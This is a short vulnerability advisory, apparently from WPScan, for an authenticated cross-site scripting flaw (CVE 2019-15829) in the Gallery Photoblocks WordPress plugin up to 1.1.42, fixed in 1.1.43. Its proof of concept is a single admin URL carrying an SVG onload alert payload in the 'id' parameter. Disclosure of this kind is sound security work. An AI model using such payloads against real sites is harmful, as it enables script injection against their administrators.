Gallery Photoblocks <= 1.1.42 - Authenticated XSS



Proof of Concept
When logged in with an account with administrator capabilities: https://<BLOG>/wp-admin/admin.php?page=photoblocks-edit&id="><svg/onload=alert(/XSS/)>

Affects Plugin

fixed in version 1.1.43

References

CVE 2019-15829
URL https://plugins.trac.wordpress.org/changeset/2119693

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 2868
Verified Yes
WPVDB ID 9443

Timeline

Publicly Published 2019-07-09 (2 months ago)
Added 2019-07-09 (2 months ago)
Last Updated 2019-08-30 (22 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin